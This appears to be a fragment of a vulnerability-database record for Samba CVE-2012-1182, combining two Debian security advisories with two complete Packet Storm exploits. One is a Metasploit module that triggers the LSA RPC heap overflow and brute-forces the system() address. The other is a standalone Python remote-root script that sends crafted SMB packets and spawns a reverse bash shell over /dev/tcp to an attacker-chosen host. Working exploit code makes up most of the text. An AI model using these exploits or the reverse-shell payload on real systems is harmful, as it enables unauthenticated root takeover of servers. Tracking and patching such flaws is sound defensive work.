"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:21", "bulletinFamily": "exploit", "description": "", "modified": "2012-09-28T00:00:00", "published": "2012-09-28T00:00:00", "href": "https://packetstormsecurity.com/files/116953/Samba-SetInformationPolicy-AuditEventsInfo-Heap-Overflow.html", "id": "PACKETSTORM:116953", "type": "packetstorm", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB \ninclude Msf::Exploit::Brute \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow', \n'Description' => %q{ \nThis module triggers a vulnerability in the LSA RPC service of the Samba daemon \nbecause of an error on the PIDL auto-generated code. Making a specially crafted \ncall to SetInformationPolicy to set a PolicyAuditEventsInformation allows to \ntrigger a heap overflow and finally execute arbitrary code with root privileges. \n \nThe module uses brute force to guess the system() address and redirect flow there \nin order to bypass NX. The start and stop addresses for brute forcing have been \ncalculated empirically. On the other hand the module provides the StartBrute and \nStopBrute which allow the user to configure his own addresses. \n}, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery \n'blasty', # Exploit \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2012-1182'], \n['OSVDB', '81303'], \n['BID', '52973'], \n['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-069/'] \n], \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 811, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic bash telnet python perl', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1' \n['2:3.5.11~dfsg-1ubuntu2 and 2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10', \n{ \n'Offset' => 0x11c0, \n'Bruteforce' => \n{ \n# The start for the final version should be 0xb20 aligned, and then step 0x1000. \n'Start' => { 'Ret' => 0x00230b20 }, \n'Stop' => { 'Ret' => 0x22a00b20 }, \n'Step' => 0x1000, \n} \n} \n], \n['2:3.5.8~dfsg-1ubuntu2 and 2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04', \n{ \n'Offset' => 0x11c0, \n'Bruteforce' => \n{ \n# The start should be 0x950 aligned, and then step 0x1000. \n'Start' => { 'Ret' => 0x00230950 }, \n'Stop' => { 'Ret' => 0x22a00950 }, \n'Step' => 0x1000, \n} \n} \n], \n['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 10.10', \n{ \n'Offset' => 0x11c0, \n'Bruteforce' => \n{ \n# The start should be 0x680 aligned, and then step 0x1000. \n'Start' => { 'Ret' => 0x00230680 }, \n'Stop' => { 'Ret' => 0x22a00680 }, \n'Step' => 0x1000, \n} \n} \n] \n], \n'DisclosureDate' => 'Apr 10 2012', \n'DefaultTarget' => 0, \n)) \n \nregister_options([ \nOptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]), \nOptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ]) \n], self.class) \n \nend \n \ndef exploit \nif target.bruteforce? \nbf = target.bruteforce \n \nif datastore['StartBrute'] and datastore['StartBrute'] > 0 \nbf.start_addresses['Ret'] = datastore['StartBrute'] \nend \n \nif datastore['StopBrute'] and datastore['StopBrute'] > 0 \nbf.stop_addresses['Ret'] = datastore['StopBrute'] \nend \n \nif bf.start_addresses['Ret'] > bf.stop_addresses['Ret'] \nraise ArgumentError, \"StartBrute should not be larger than StopBrute\" \nend \nend \nsuper \nend \n \ndef check \nbegin \nconnect() \nsmb_login() \ndisconnect() \n \nversion = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0] \nminor = version.scan(/\\.(\\d*)$/).flatten[0].to_i \nprint_status(\"Version found: #{version}\") \n \nreturn Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16 \nreturn Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14 \nreturn Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4 \n \nreturn Exploit::CheckCode::Safe \n \nrescue ::Exception \nreturn CheckCode::Unknown \nend \nend \n \ndef brute_exploit(target_addrs) \n \nprint_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['Ret']) \ndatastore['DCERPC::fake_bind_multi'] = false \ndatastore['DCERPC::max_frag_size'] = 4248 \n \npipe = \"lsarpc\" \n \nprint_status(\"Connecting to the SMB service...\") \nconnect() \nprint_status(\"Login to the SMB service...\") \nsmb_login() \n \nhandle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"]) \nprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nprint_status(\"Bound to #{handle} ...\") \n \nstub = \"X\" * 20 \n \ncmd = \";;;;\" # padding \ncmd << \"#{payload.encoded}\\x00\" # system argument \ntmp = cmd * (816/cmd.length) \ntmp << \"\\x00\"*(816-tmp.length) \n \nstub << NDR.short(2) # level \nstub << NDR.short(2) # level 2 \nstub << NDR.long(1) # auditing mode \nstub << NDR.long(1) # ptr \nstub << NDR.long(100000) # r-> count \nstub << NDR.long(20) # array size \nstub << NDR.long(0) \nstub << NDR.long(100) \nstub << rand_text_alpha(target['Offset']) \n# Crafted talloc chunk \nstub << 'A' * 8 # next, prev \nstub << NDR.long(0) + NDR.long(0) # parent, child \nstub << NDR.long(0) # refs \nstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP \nstub << NDR.long(0) # name \nstub << \"AAAA\" # size \nstub << NDR.long(0xe8150c70) # flags \nstub << \"AAAABBBB\" \nstub << tmp # pointer to tmp+4 in $esp \nstub << rand_text(32632) \nstub << rand_text(62000) \n \nprint_status(\"Calling the vulnerable function...\") \n \nbegin \ncall(dcerpc, 0x08, stub) \nrescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError \nprint_status('Server did not respond, this is expected') \nrescue Rex::Proto::DCERPC::Exceptions::Fault \nprint_error('Server is most likely patched...') \nrescue => e \nif e.to_s =~ /STATUS_PIPE_DISCONNECTED/ \nprint_status('Server disconnected, this is expected') \nend \nend \n \nhandler \ndisconnect \nend \n \n# Perform a DCE/RPC Function Call \ndef call(dcerpc, function, data, do_recv = true) \n \nfrag_size = data.length \nif dcerpc.options['frag_size'] \nfrag_size = dcerpc.options['frag_size'] \nend \nobject_id = '' \nif dcerpc.options['object_call'] \nobject_id = dcerpc.handle.uuid[0] \nend \nif options['random_object_id'] \nobject_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) \nend \n \ncall_packets = make_request(function, data, frag_size, dcerpc.context, object_id) \ncall_packets.each { |packet| \nwrite(dcerpc, packet) \n} \n \nreturn true if not do_recv \n \nraw_response = '' \n \nbegin \nraw_response = dcerpc.read() \nrescue ::EOFError \nraise Rex::Proto::DCERPC::Exceptions::NoResponse \nend \n \nif (raw_response == nil or raw_response.length == 0) \nraise Rex::Proto::DCERPC::Exceptions::NoResponse \nend \n \n \ndcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response) \n \nif dcerpc.last_response.type == 3 \ne = Rex::Proto::DCERPC::Exceptions::Fault.new \ne.fault = dcerpc.last_response.status \nraise e \nend \n \ndcerpc.last_response.stub_data \nend \n \n# Used to create standard DCERPC REQUEST packet(s) \ndef make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '') \n \nopnum = opnum.to_i \nsize = size.to_i \nctx = ctx.to_i \n \nchunks, frags = [], [] \nptr = 0 \n \n# Break the request into fragments of 'size' bytes \nwhile ptr < data.length \nchunks.push( data[ ptr, size ] ) \nptr += size \nend \n \n# Process requests with no stub data \nif chunks.length == 0 \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) ) \nreturn frags \nend \n \n# Process requests with only one fragment \nif chunks.length == 1 \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) ) \nreturn frags \nend \n \n# Create the first fragment of the request \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) ) \n \n# Create all of the middle fragments \nwhile chunks.length != 1 \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) ) \nend \n \n# Create the last fragment of the request \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) ) \n \nreturn frags \nend \n \n# Write data to the underlying socket \ndef write(dcerpc, data) \ndcerpc.socket.write(data) \ndata.length \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/116953/setinfopolicy_heap.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:25:26", "bulletinFamily": "exploit", "description": "", "modified": "2012-09-25T00:00:00", "published": "2012-09-25T00:00:00", "href": "https://packetstormsecurity.com/files/116843/Samba-3.x-Remote-Root.html", "id": "PACKETSTORM:116843", "type": "packetstorm", "title": "Samba 3.x Remote Root", "sourceData": "`#!/usr/bin/python \n# \n# finding targets 4 31337z: \n# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1' \n# -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell \n# found by eax samba 0day godz (loljk) \n \n \nfrom binascii import hexlify, unhexlify \nimport socket \nimport threading \nimport SocketServer \nimport sys \nimport os \nimport time \nimport struct \n \ntargets = [ \n{ \n\"name\" : \"samba_3.6.3-debian6\", \n\"chunk_offset\" : 0x9148, \n\"system_libc_offset\" : 0xb6d003c0 \n}, \n{ \n\"name\" : \"samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)\", \n\"chunk_offset\" : 4560, \n\"system_libc_offset\" : 0xb20 \n}, \n{ \n\"name\" : \"target_finder (hardcode correct system addr)\", \n\"chunk_offset\" : 0, \n\"system_libc_offset\" : 0xb6d1a3c0, \n\"finder\": True \n} \n] \n \ndo_brute = True \nrs = 1024 \nFILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) \n \ndef dump(src, length=32): \nresult=[] \nfor i in xrange(0, len(src), length): \ns = src[i:i+length] \nhexa = ' '.join([\"%02x\"%ord(x) for x in s]) \nprintable = s.translate(FILTER) \nresult.append(\"%04x %-*s %s\\n\" % (i, length*3, hexa, printable)) \nreturn ''.join(result) \n \n \nsploitshake = [ \n# HELLO \n\"8100004420434b4644454e4543464445\" + \\ \n\"46464346474546464343414341434143\" + \\ \n\"41434143410020454745424644464545\" + \\ \n\"43455046494341434143414341434143\" + \\ \n\"4143414341414100\", \n \n# NTLM_NEGOT \n\"0000002fff534d427200000000000000\" + \\ \n\"00000000000000000000000000001d14\" + \\ \n\"00000000000c00024e54204c4d20302e\" + \\ \n\"313200\", \n \n# SESSION_SETUP \n\"0000004bff534d427300000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"000000000dff000000ffff02001d1499\" + \\ \n\"1f00000000000000000000010000000e\" + \\ \n\"000000706f736978007079736d6200\", \n \n# TREE_CONNECT \n\"00000044ff534d427500000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"6400000004ff00000000000100190000\" + \\ \n\"5c5c2a534d425345525645525c495043\" + \\ \n\"24003f3f3f3f3f00\", \n \n# NT_CREATE \n\"00000059ff534d42a200000000180100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000018ff00000000050016000000\" + \\ \n\"000000009f0102000000000000000000\" + \\ \n\"00000000030000000100000040000000\" + \\ \n\"020000000306005c73616d7200\" \n] \n \npwnsauce = { \n'smb_bind': \\ \n\"00000092ff534d422500000000000100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000010000048000004e0ff000000\" + \\ \n\"0000000000000000004a0048004a0002\" + \\ \n\"002600babe4f005c504950455c000500\" + \\ \n\"0b03100000004800000001000000b810\" + \\ \n\"b8100000000001000000000001007857\" + \\ \n\"34123412cdabef000123456789ab0000\" + \\ \n\"0000045d888aeb1cc9119fe808002b10\" + \\ \n\"486002000000\", \n \n'data_chunk': \\ \n\"000010efff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"640000000eff000000babe00000000ff\" + \\ \n\"0000000800b0100000b0103f00000000\" + \\ \n\"00b0100500000110000000b010000001\" + \\ \n\"0000009810000000000800\", \n \n'final_chunk': \\ \n\"000009a3ff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"640000000eff000000babe00000000ff\" + \\ \n\"00000008006409000064093f00000000\" + \\ \n\"00640905000002100000006409000001\" + \\ \n\"0000004c09000000000800\" \n} \n \n \ndef exploit(host, port, cbhost, cbport, target): \nglobal sploitshake, pwnsauce \n \nchunk_size = 4248 \n \ntarget_tcp = (host, port) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(target_tcp) \n \nn = 0 \nfor pkt in sploitshake: \ns.send(unhexlify(pkt)) \npkt_res = s.recv(rs) \nn = n+1 \n \nfid = hexlify(pkt_res[0x2a] + pkt_res[0x2b]) \n \ns.send(unhexlify(pwnsauce['smb_bind'].replace(\"babe\", fid))) \npkt_res = s.recv(rs) \n \nbuf = \"X\"*20 # policy handle \nlevel = 2 #LSA_POLICY_INFO_AUDIT_EVENTS \nbuf+=struct.pack('<H',level) # level \nbuf+=struct.pack('<H',level)# level2 \nbuf+=struct.pack('<L',1)#auditing_mode \nbuf+=struct.pack('<L',1)#ptr \nbuf+=struct.pack('<L',100000) # r->count \nbuf+=struct.pack('<L',20) # array_size \nbuf+=struct.pack('<L',0) \nbuf+=struct.pack('<L',100) \n \nbuf += (\"A\" * target['chunk_offset']) \n \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0xe8150c70); \nbuf+=\"AAAABBBB\" \n \ncmd = \";;;;/bin/bash -c '/bin/bash 0</dev/tcp/\"+cbhost+\"/\"+cbport+\" 1>&0 2>&0' &\\x00\" \n \ntmp = cmd*(816/len(cmd)) \ntmp += \"\\x00\"*(816-len(tmp)) \n \nbuf+=tmp \nbuf+=\"A\"*(37192-target['chunk_offset']) \nbuf+='z'*(100000 - (28000 + 10000)) \n \nbuf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)] \nn=0 \n \nfor chunk in buf_chunks: \nif len(chunk) != chunk_size: \n#print \"LAST CHUNK #%d\" % n \nbb = unhexlify(pwnsauce['final_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nelse: \n#print \"CHUNK #%d\" % n \nbb = unhexlify(pwnsauce['data_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nretbuf = s.recv(rs) \nn=n+1 \n \ns.close() \n \nclass connectback_shell(SocketServer.BaseRequestHandler): \ndef handle(self): \nglobal do_brute \n \nprint \"\\n[!] connectback shell from %s\" % self.client_address[0] \ndo_brute = False \n \ns = self.request \n \nimport termios, tty, select, os \nold_settings = termios.tcgetattr(0) \ntry: \ntty.setcbreak(0) \nc = True \nwhile c: \nfor i in select.select([0, s.fileno()], [], [], 0)[0]: \nc = os.read(i, 1024) \nif c: \nif i == 0: \nos.write(1, c) \n \nos.write(s.fileno() if i == 0 else 1, c) \nexcept KeyboardInterrupt: pass \nfinally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) \n \nreturn \n \n \nclass ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): \npass \n \n \nif len(sys.argv) != 6: \nprint \"\\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\\n\" \nprint \" usage: %s <targethost> <targetport> <myip> <myport> <target>\\n\" % (sys.argv[0]) \nprint \" targets:\" \ni = 0 \nfor target in targets: \nprint \" %02d) %s\" % (i, target['name']) \ni = i+1 \n \nprint \"\" \nsys.exit(-1) \n \n \ntarget = targets[int(sys.argv[5])] \n \nserver = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell) \nserver_thread = threading.Thread(target=server.serve_forever) \nserver_thread.daemon = True \nserver_thread.start() \n \nwhile do_brute == True: \nsys.stdout.write(\"\\r{+} TRYING EIP=\\x1b[31m0x%08x\\x1b[0m OFFSET=\\x1b[32m0x%08x\\x1b[0m\" % (target['system_libc_offset'], target['chunk_offset'])) \nsys.stdout.flush() \nexploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target) \n \nif \"finder\" in target: \ntarget['chunk_offset'] += 4 \nelse: \ntarget['system_libc_offset'] += 0x1000 \n \n \nif \"finder\" in target: \nprint \\ \n\"{!} found \\x1b[32mNEW\\x1b[0m target: chunk_offset = ~%d, \" \\ \n\"system_libc_offset = 0x%03x\" % \\ \n(target['chunk_offset'], target['system_libc_offset'] & 0xff000fff) \n \nwhile 1: \ntime.sleep(999) \n \nserver.shutdown() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/116843/samba3-exec.txt"}], "debian": [{"lastseen": "2019-05-30T02:22:03", "bulletinFamily": "unix", "description": "I uploaded new packages for samba which fixed the following security problem:\n\nCVE-2012-1182\n PIDL based autogenerated code allows overwriting beyond of allocated\n array.\n\nFor the squeeze-backports distribution the problems have been fixed in\nversion 2:3.6.4-1~bpo60+1.\n\n-- \n\n\n\n", "modified": "2012-04-24T10:07:34", "published": "2012-04-24T10:07:34", "id": "DEBIAN:BSA-070:68853", "href": "https://lists.debian.org/debian-backports-announce/2012/debian-backports-announce-201204/msg00000.html", "title": "[BSA-070] Security Update for samba", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:28", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2450-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nApril 12, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nVulnerability : privilege escalation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-1182\nDebian Bug : 668309\n\nIt was discovered that Samba, the SMB/CIFS file, print, and login server,\ncontained a flaw in the remote procedure call (RPC) code which allowed\nremote code execution as the super user from an unauthenticated\nconnection.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.6.4-1.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2012-04-12T20:30:03", "published": "2012-04-12T20:30:03", "id": "DEBIAN:DSA-2450-1:77F45", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00080.html", "title": "[SECURITY] [DSA 2450-1] samba security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}